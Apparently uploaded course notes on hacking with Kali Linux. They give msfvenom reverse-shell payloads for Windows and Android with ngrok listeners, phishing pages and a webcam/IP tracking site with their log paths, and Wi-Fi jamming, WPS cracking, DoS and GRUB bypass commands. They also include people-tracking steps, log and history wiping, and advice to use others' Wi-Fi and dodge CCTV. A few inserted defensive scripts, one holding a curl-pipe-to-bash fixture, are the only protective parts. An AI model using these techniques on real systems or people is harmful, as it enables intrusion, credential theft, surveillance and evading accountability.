
Ethical Hacking With Kali Linux Notes

Kali Linux is an operating system used by ethical hackers and penetration testers. It is based on Debian Linux and was previously known as BackTrack. Kali includes tools for networking, password cracking, vulnerability assessment and penetration testing. The document provides instructions on installing Kali in a virtual machine, using basic commands, setting up users, installing software from repositories and GitHub, and configuring networking and file sharing. It also introduces concepts in ethical hacking like Metasploit, a framework for testing security.

Uploaded by

dhaval

PART 01 | ETHICAL HACKING WITH KALI LINUX

01 | Kali Linux Basics

Kali : Introduction
Kali is a special OS used by ETHICAL HACKERS and PENTESTERS.
It is based on DEBIAN LINUX.

Kali : History
Its older name was BACK TRACK.
It was renamed after its 6th VERSION.
The 6th VERSION is known as KALI LINUX.
Competitors : Parrot Security OS | BlackArch | BackBox

Kali : Download and Importing in Virtual Box


The ways to use KALI LINUX :
1] Install on physical system - Not recommended
2] Using LIVE KALI USB Drive - Not recommended
3] Installing on VIRTUAL BOX - Most Preferred Choice
4] Using OVA file - BEST.

OVA = Open Virtual Appliance > Oracle Virtual Box


Practical :
kali > ova > Virtual Box > File > Import Appliance > KALI.OVA > NEXT > FINISH
Processing...
Kali OS.
Username / Password : kali / kali

Kali : Basic Commands

ifconfig > IP details - ether | inet


ping > Remote system LIVE or NOT
mkdir FOLDERNAME > Create Folder
nano FILENAME.TXT > Create file | Ctrl+S to save | Ctrl+X to exit
rm -rf FOLDERNAME > Delete folder
rm FILENAME.TXT > Delete file
cd FOLDERNAME > to go to any folder
cd .. > to get out from the CURRENT FOLDER
pwd > Print Working Directory - Live Folder Path
whoami > Current Login User Name
reboot > System restart
cp filename DESTINATION_PATH > File copy - /root/Desktop/aparichit/
mv filename DESTINATION_PATH > File Move

chmod +x *.* > To give execution permission to ALL FILES in a folder whose names contain a dot
bash FILENAME.sh > To execute .SH tools [ Shell Script Tools ]
python FILENAME.py > To execute .PY tools [ Python Tools ]

macchanger -s eth0 > Show current MAC address of ETH0 or WLAN0


ls > list content of the folder

git clone GITHUB_LINK_PASTE_HERE > Downloading Software from GITHUB

[ Software is known as a PACKAGE in KALI.
On the GitHub site the package is kept as a GIT repository.
Clone = Download or Copying the package to our system ]

history > shows all past commands typed on the terminal screen
history -c > Clears history logs [ Sometimes doesn't work ;) ]

clear > clears the screen of terminal


Ctrl+C > To cancel any ongoing process
exit > Terminal exit

Kali : General User and Root User
$ sign > Identifies this is a GENERAL OR STANDARD USER on KALI TERMINAL
# sign > Identifies this is a ROOT or ADMIN USER on KALI TERMINAL

Kali : Setup Root User Password


Open terminal > $ > sudo passwd root [ Enter ] > Pass : kali > New Pass : set the root password here.
Repeat to confirm.
[ sudo = Super User Do = Same as RUN AS ADMINISTRATOR ]

Kali : User Management


Create user : useradd USERNAME
Delete User : userdel USERNAME
Change User Password : passwd USERNAME [ Enter ]

Kali : File Sharing with Windows


Virtual Box > Devices > Shared Folder > Shared Folder Settings >
Right side PLUS icon > Windows Folder > Tick : Auto Mount and Tick : Make Permanent > OK.
Verify : FILE SYSTEM > Left side... SHARED FOLDER will be visible here.

Kali : Set Network Bridge or NAT


Virtual Box > Machine > Network > Right side, NAT => Bridge Adapter > Ok. Ok.
This puts the Kali system on the SAME WIFI network, so we can perform network practicals.

Kali : File And Folder Deletion


rm -rf FOLDERNAME > Delete folder
rm FILENAME > Delete Files

Kali : File Permissions


chmod +x *.*

Kali : Software Installation from GITHUB

Search in google : softwarename github , example : easysploit github


Open first link from google results
Find CODE button with a GREEN color, click on it, and COPY the link.
It is called the GIT LINK.

Installation Of Software :
1] Copy Tool Link from GITHUB
2] Open terminal and type the following command :
git clone PASTE_GITLINK_HERE
Note : This will download the software folder on your system

3] After download, go to that folder using cd toolname


4] Give permission for execution : chmod +x *.*
5] Find INSTALLER, INSTALL, SETUP file with .sh or .py extension in the tool folder
If it exists..
Then run the file as below :
if file has .SH extension :> bash filename.sh
if file has .PY extension :> python filename.py
[ For python, if it doesn't work, use python2; if that doesn't work, use python3; if that doesn't work, don't worry... just DELETE it ;) ]

If this file doesn't exist, skip this step.

6] Find REQUIREMENTS.TXT file in the folder


If exists..
Run the following command :
pip install -r requirements.txt

This requirements.txt lists the support packages the software needs; pip automatically downloads and installs them for us.

[ Note, if some error shows : install pip3 using apt install python3-pip ]

If it doesn't exist,
Skip this step.

7] Finally, find the file with name of the TOOL.


Run it using BASH or PYTHON depending on the file extension.
If there is no EXTENSION with the file
Just type the command like below :

./toolname
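
Added example (not part of the original notes): before steps 4 to 7 run anything from a freshly cloned folder, the shell function below lists installer lines that pipe a download into a shell or decode base64, and requirements.txt entries that are not pinned to a version. The sample tool folder, its file contents and the name review_tool are constructed for the example.

```sh
#!/bin/sh
# Added example: review a cloned tool folder BEFORE chmod +x / bash install.sh.
# review_tool and the sample folder below are constructed for illustration.

# Lines worth reading by hand: a download piped into a shell, or a base64 decode.
RISKY='(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(ba)?sh|base64[[:space:]]+(-d|--decode)'

review_tool() {
    dir=$1
    # Step 5 files: INSTALLER / INSTALL / SETUP scripts ending in .sh or .py
    find "$dir" -maxdepth 2 -type f \( -iname 'install*' -o -iname 'setup*' \) \
        \( -name '*.sh' -o -name '*.py' \) -exec grep -HnE "$RISKY" {} + |
        sed 's/^/SCRIPT /'
    # Step 6 file: a requirement without == installs whatever is newest today
    if [ -f "$dir/requirements.txt" ]; then
        grep -vE '^[[:space:]]*(#|$)' "$dir/requirements.txt" | grep -v '==' |
            sed 's/^/UNPINNED /'
    fi
    return 0
}

# --- constructed sample folder (stands in for a freshly cloned repo) ---
demo=$(mktemp -d)
mkdir -p "$demo/sampletool"
cat > "$demo/sampletool/install.sh" <<'EOF'
#!/bin/bash
apt install -y python3-pip
curl -s http://example.invalid/stage2.sh | bash
EOF
printf '%s\n' '# deps' 'requests==2.31.0' 'colorama' > "$demo/sampletool/requirements.txt"

review_tool "$demo/sampletool"
```

Any SCRIPT or UNPINNED line is a reason to read the file before running it, and running unknown tools inside the VM as the non-root kali user limits what an installer can change.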
Kali : Software Installation from REPOSITORY

Like the Play Store, some apps are available from the Kali repository.
It is like a tools bank.
For those tools we have to type the following command :

apt install toolname


example :
apt install tor
apt install wireshark
apt install openssh-server

DOWNLOAD AND INSTALL THESE FOLDERS:

easysploit
easymacchanger
osi.ig
sherlock
slowloris
hulk
xlr8
zphisher
cupp
camphish

02 | Advanced Networking for Hackers

Network
A network is a group of computer systems that SHARE DATA and RESOURCES.

OSI Model
OSI = Open Systems Interconnection
Devices from multiple companies can COMMUNICATE !!
7 Layers : International Standard

TCP/IP Protocols
TCP = Transmission Control Protocol
Send and Receive

IP = Internet Protocol
Addressing

Working of HTTP and HTTPS


HTTP = Hypertext Transfer Protocol
Port : 80 or 8080
HTTPS = Hypertext Transfer Protocol Secure [ SSL = Secure Sockets Layer ]
Port : 443

[ TLS = Transport Layer Security ]

Working of FTP
FTP = File Transfer Protocol
Work : Use to DOWNLOAD or UPLOAD files to SERVER
Port : 21

Working of DNS
DNS = Domain Name System
Work : Translates DOMAIN NAME to IP ADDRESS
Port : 53

Working of DHCP
DHCP = Dynamic Host Configuration Protocol
Work : Automatically assign IP Address to connected systems
Port : 67

Working of SMTP
SMTP = Simple Mail Transfer Protocol
Work : Sending of MAIL
Port : 25

Working of POP3 and IMAP
POP3 = Post Office Protocol version 3
Work : Receiving Mails
Port : 110

IMAP : Internet Message Access Protocol


Work : Receiving Mails
Port : 143

Working of TELNET
Work : Remote Control of the System | SSH Server
Port : 23

Working of SSH
Work : Remote Control of the System
Port : 22

Working of NTP
Work : Network Time Control and Management
Port : 123

03 | Server Management on Kali

What is SERVER ?
Any system that provides specific SERVICE is known as SERVER.

What is CLIENT ?
Any system that USES or REQUEST service from the SERVER is known as Client.

* Server or Client is SOFTWARE, and when we install it on hardware, that hardware becomes a SERVER or CLIENT.

SERVER 01 | SSH SERVER SETUP

Open Terminal
Install SSH Server Software :
apt install openssh-server
nano /etc/ssh/sshd_config
Edit this :
#PermitRootLogin prohibit-password
Change :
Remove Hash
Replace prohibit-password with : yes

Save the file and exit : Ctrl+S | Ctrl+X

Starting SSH Server ?


Start : service ssh start
Status : service ssh status
Stop : service ssh stop

On Windows Side ?
Download and install any SSH Client Utility:
MobaXterm Download.
Run the tool
Left side : SESSIONS > IP = Kali System SSH SERVER >
Terminal : USERNAME and PASS [ KALI ]
...
Now WE CAN CONTROL KALI using SSH SERVER.
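
Added example (not part of the original notes): the edit above turns on password login for root, so the server is only as strong as the root password. The shell functions below report the effective PermitRootLogin and PasswordAuthentication values of a config file; the sample files and the names sshd_value and audit_sshd are constructed, and Include files and Match blocks are not followed (sshd -T prints the live effective config).

```sh
#!/bin/sh
# Added example: check the two sshd_config settings that decide whether
# root can log in over SSH with a password. Names and samples are constructed.

# sshd_value FILE KEYWORD DEFAULT -> effective global value (lower case).
# sshd keeps the FIRST value it reads for a keyword; "#" lines are inactive.
sshd_value() {
    awk -v key="$2" -v def="$3" '
        /^[ \t]*#/                   { next }
        tolower($1) == "match"       { exit }   # per-user blocks: not evaluated here
        tolower($1) == tolower(key)  { print tolower($2); found = 1; exit }
        END { if (!found) print def }           # keyword absent: OpenSSH default
    ' "$1"
}

# audit_sshd FILE -> one line per finding, nothing when the file is clean.
audit_sshd() {
    root=$(sshd_value "$1" PermitRootLogin prohibit-password)
    pass=$(sshd_value "$1" PasswordAuthentication yes)
    if [ "$root" = "yes" ]; then
        echo "FAIL PermitRootLogin yes: root can log in with only a password"
    fi
    if [ "$pass" = "yes" ]; then
        echo "WARN PasswordAuthentication yes: passwords can be guessed over the network"
    fi
    return 0
}

# --- constructed samples ---
cfgdir=$(mktemp -d)
# The file as edited in this section
printf '%s\n' 'Port 22' 'PermitRootLogin yes' '#PasswordAuthentication yes' > "$cfgdir/edited"
# Key-only logins, no direct root login
printf '%s\n' 'Port 22' 'PermitRootLogin no' 'PasswordAuthentication no' > "$cfgdir/hardened"

for f in edited hardened; do
    echo "== $f"
    audit_sshd "$cfgdir/$f"
done
```

For a lab VM on a bridged network, the hardened sample plus a key in ~/.ssh/authorized_keys gives the same remote control without exposing a root password prompt.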
SERVER 02 | WEB SERVER SETUP

Setup Web Server on Kali


Apache2

Start : service apache2 start


Stop : service apache2 stop
Status : service apache2 status

Files ?
/var/www/html

04 | Identity Changing

Change IP Address on Kali


Note :
Don't change your IP, always use OTHERS WIFI Network.
Remember CCTV Camera, and changing of MAC Address is a must.

Change MAC Address on Kali

Method 01 | Manually
macchanger -s eth0 => shows current mac address of system
ifconfig eth0 down => disables ethernet nic
macchanger -r eth0 => changes mac of ethernet nic
ifconfig eth0 up => enables ethernet nic
macchanger -s eth0 => verify mac address is changed
macchanger -p eth0 => Reset mac address (get back original)

-s = show
-r = random mac address to set
eth0 = ethernet
wlan0 = wifi card

Method 02 | Using Tool


easymacchanger
run the tool
select any brand name and hit enter.
That's it :)

Change OS and Browser on Kali


Extension : user agent switcher for firefox

05 | Social Media Hacking and Security

Phishing Project :

Instagram : http://cspsec.in/insta/
| Pass : /data.txt

Facebook : http://cspsec.in/facebook/
| Pass : /data.txt

Google : http://cspsec.in/google/
| Pass : /data.txt

IP and Camera Tracking Site :


https://datingrajkot.fun
| Images : /images/webcam_images/
| IP : /logfile.txt

GPS Tracker :
https://cspsec.in/
| Location : /long_lat.txt

MTF Download Site :


https://esec.club

06 | Password Hacking

Hacking Linux Password ?


Locked !!!
Restart.
2nd number option : select
E = EDIT
Code ...

Linux
ro quiet splash
Replace with following :
rw initrd=/install/gtk/initrd.gz quiet splash init=/bin/bash

Ctrl+S
Ctrl+X

passwd root
Set new pass here.

To run kali in GRAPHICAL MODE type the following two commands :

exec /sbin/init

Module 07 | Hacking with Metasploit

Meta = Big
Exploit = To break something

It is a framework for hackers and pentesters to TEST security.


We can also develop our own features and add to metasploit software.

Important Terms :

Payload : Specific code to use to attack


Exploit : Executing payload on target system
lhost = local host > Ip address of our own attacker machine, kali
lport = local port > Port number of our own attacker machine, kali
rhost = remote host > target machine's ip
rport = remote port > target machine's port number
listener = program that waits for the connection from target computer

sessions -l = list available sessions
sessions -i 1 = selecting specific session from list

meterpreter = The terminal that we get after successful attack on target


We can only have the CLI access of target, not graphical.

-f = format of the file


R = Raw data > apk file created by metasploit

METASPLOIT main utilities :-


msfvenom => Used to create PAYLOAD, Apk or Exe file for TARGET
msfconsole => Used to create LISTENER, to connect with the TARGET

Methods of Connection :-
reverse_tcp => Once our payload is executed, target will COME TO CONNECT US.
bind_tcp => Once our payload is executed, we have to CONNECT to TARGET.
Note : reverse_tcp is BETTER, it will BYPASS the Firewall of the Target System.

HACKING with METASPLOIT

1] Create Payload using MSFVENOM


2] Create Listener using MSFCONSOLE
3] Send APK or EXE file to TARGET SYSTEM and convince him/her to RUN the file
4] Get METERPRETER terminal and Control the SYSTEM ! :)

1] Creating Payload
Hacking Windows :
msfvenom -p windows/meterpreter/reverse_tcp lhost=YOURIP lport=4444 -f exe > hacker.exe

Hacking Android :
msfvenom -p android/meterpreter/reverse_tcp lhost=YOURIP lport=4444 R > hacker.apk

2] Starting Listener ?
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IPofKALI
set lport 4444
exploit

Windows Commands :
screenshare => Shows live screen of Target
webcam_stream => Shows live webcam stream from Target
shell => Shows command prompt of the Target

Android Commands :
hide_app_icon
dump_contacts
dump_sms
dump_calllog
webcam_snap

Protection :
Windows Defender Firewall should be ON and UPDATED regularly.
Android Play Protect should be ON; CHECK its STATUS regularly, because some spyware DISABLES it.

Hacking Over Internet ?
Sign up Account on NGROK.COM
Sign in and Download NGROK For Linux
Extract Downloaded file and run the AUTHENTICATION TOKEN Command given on the webpage

Get LHOST and LPORT for Payload ?


./ngrok tcp 4444
This will create a link, where you will find something like this :
2.tcp.ngrok.io:15078
Here,
LHOST = 2.tcp.ngrok.io
LPORT = 15078

Set Listener For Public Payload ?


Just change two things as below :
set lhost 0.0.0.0
set lport 4444

All other things are OK.
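
Added example (not part of the original notes): seen from the defending network, a reverse_tcp payload is an outbound connection, either to an ngrok TCP endpoint like 2.tcp.ngrok.io:15078 or to the listener port 4444 used above. The shell function below counts such connections per source in an egress log; the four-field log format, the sample lines and the name flag_egress are constructed for the example.

```sh
#!/bin/sh
# Added example: find reverse_tcp style call-outs in an egress log.
# Assumed (constructed) log format: time src_ip dst_host dst_port

flag_egress() {
    awk '
        { host = tolower($3); port = $4 + 0; why = "" }
        # ngrok TCP tunnel endpoints such as 2.tcp.ngrok.io; one extra label
        # before ngrok.io is also accepted (assumption: regional endpoints)
        host ~ /\.tcp\.([a-z0-9-]+\.)?ngrok\.io$/ { why = "ngrok-tcp-tunnel" }
        # 4444 is the port used for the listener in these notes
        why == "" && port == 4444                 { why = "listener-port-4444" }
        why != "" { hits[why " " $2 " " host ":" port]++ }
        END { for (k in hits) print hits[k], k }
    ' "$1" | sort -k2
}

# --- constructed sample log ---
log=$(mktemp)
cat > "$log" <<'EOF'
2024-01-10T09:00:01 192.168.0.23 www.example.com 443
2024-01-10T09:00:05 192.168.0.23 2.tcp.ngrok.io 15078
2024-01-10T09:01:05 192.168.0.23 2.tcp.ngrok.io 15078
2024-01-10T09:02:10 192.168.0.31 192.168.0.50 4444
2024-01-10T09:03:00 192.168.0.40 dns.example.net 53
EOF

flag_egress "$log"
```

Both the port and the tunnel host are chosen by whoever builds the payload, so a hit is a lead to investigate on the source machine and a clean log proves nothing.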


08 | Advanced Payload Execution in Target System
Method 01 | Download and Execute Payload Automatically
Try BAT file : Go to our TOOLSBOX

Method 02 | Download and execute file using AUTOIT


Try AU3 File : Go to our TOOLSBOX
Install AutoIT software and then compile the au3 file into EXE and Test

09 | WIFI Hacking and Security


Jam Wifi using MDK3
airmon-ng start wlan0
airmon-ng check kill
airodump-ng wlan0
Find Channel number of the target
Final command :
mdk3 wlan -c 6

Jam Wifi using Aircrack-ng


Not working properly.

Making of Wifi Jammer Device using NodeMCU 8266 Chip


Level 01 : Using NODE MCU ESP 8266 : Done

Creating WORD LIST | CUPP


python3 cupp.py -i

Find Saved WIFI Passwords from Linux Systems


nano /etc/NetworkManager/system-connections/wifiname
psk=password

Hacking WPA and WPA2 without WORDLIST


Using WPS PIN ATTACK
Tool : Reaver
reaver -i wlan0 -c 6 -b 00:23:69:48:33:95 -vv

Cracking WPA and WPA2 Using a Wordlist


Not working.

10 | Tracking Person
Information Gathering :
Track IP Address of the Person
Track Picture of the Person

Site : datingrajkot.fun
Photo Link : datingrajkot.fun/images/webcam_images
IP Link : datingrajkot.fun/logfile.txt

Instagram Information Gathering


Tool : osi.ig
Use : To find basic details about an Instagram user without logging in to Instagram.

python3 main.py -u USERNAME

Example : python3 main.py -u aparichit85

Sherlock : Finding Same Usernames on Different Sites of Internet


Use : Finding the same username on different sites to find profiles of the same person on the Internet

python3 sherlock aparichit85


PART 02 | PENETRATION TESTING

01 | Penetration Testing Introduction

Introduction
Penetration Testing means TESTING the SECURITY of a DEVICE, SERVER or USER COMPUTER.
Hacking with legal permission is known as PENETRATION TESTING.
The person who does these tests is known as a PENTESTER or PENETRATION TESTER.

Types of Penetration Testing : BlackBox | WhiteBox | GrayBox

BlackBox
In this type of pentest, only the company name is given to the PENTESTERS.
All other information like site, IP address, ports and other details the PENTESTER has to find.

WhiteBox
In this type of pentest, all info about the target device, server or system is given with legal permission.

GrayBox
In this type of pentest, some info is given and some is missing, so the PENTESTER has to find the missing information.

Setup Networking in Lab


Machine > Network > NAT to Bridge > Check IP

02 | Information Gathering

Find IP Address of System


ifconfig

Find Network Range of Network


Find Network Devices
Find Servers
Find Open Ports on Target System
nmap -sV 192.168.0.1/24

Find Routers IP Address


ipconfig | findstr /i "Gateway"

Find CCTV DVRs IP Address


Find system that has only ONE port : 80 OR 8080 opened

Scanning with Net Discover


netdiscover

Find Operating System on Target System


nmap -O ip or nmap -O -T4 ip

Find Software Versions on Target System


nmap -sV ip

Find Service Version on Specific Port Number


nmap -sV -p 80 ip

03 | Hacking Metasploitable with Metasploit

SETUP Metasploitable SERVER on VIRTUAL BOX ?

Requirement : Metasploitable Server File

Process :
New > Linux > Name = SERVER > Next
Set RAM > Next
Set VDI > Next
Set HDD > Next
Ok.

Click on STORAGE
Select VDI File
Right side : Choose metasploitable.vdi file
ok.

Understanding Vulnerability
Vulnerability is a weakness in the software or system that can be misused by the hacker.

Finding Exploit
Once a hacker knows the vulnerability, they find the exploit code for the specific version and then try it.

Running Exploit
Exploits are run on metasploit msfconsole.

STEP 01 | Scanning
nmap -sV TargetIP
-sV = Service Version
SERVER : Open port, Software, Software Version

STEP 02 | Searching Exploit Metasploit Commands on Internet


21 | FTP | vsftpd 2.3.4
Google : exploit for vsftpd 2.3.4 rapid7

STEP 03 | Executing the EXPLOIT


msfconsole
And follow the commands found on Exploit Page

SERVER HACK 01 | FTP SERVER
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set rhost SERVERIP
exploit

SERVER HACK 02 | IRC SERVER


IRC = Internet Relay Chat

use exploit/unix/irc/unreal_ircd_3281_backdoor
set payload cmd/unix/reverse_perl
set rhost [target ip]
set lhost [attackbox ip]
exploit

SERVER HACK 03 | DOS ATTACK on WEB SERVER


use auxiliary/dos/http/slowloris
set RHOST TargetIP
exploit

SERVER HACK 04 | Hacking WEB SERVER


use exploit/multi/http/php_cgi_arg_injection
set RHOST TargetIP
exploit

04 | Website Hacking and Security

Scraping Complete Website


Tool : httrack

Find Files and Folders on the Target Website with DIRBUSTER


Directory Listing Vulnerability
Example : Our Website

Finding Vulnerability : Scanning Website with Online Service


pentest-tools.com

Finding Vulnerability : Scanning Website with Kali Linux Tool - Nikto


apt install nikto
nikto -h ipoftarget

Advanced DOS and DDOS Attack using Kali


slowloris
python3 slowloris.py TARGETIP -s 500

hulk
python hulk.py https://sitename.com

05 | Clearing Tracks

Removing Evidence from Kali Linux Terminal Command History


history -c or history -w
set +o history [ Disable ]
set -o history [ Enable ]

Removing Evidence from Windows Logs [ Windows OS ]


eventvwr

Removing Evidence from Pen Drive [ Overwrite with Low Level Format ]
Tool : Low Level Format Tool
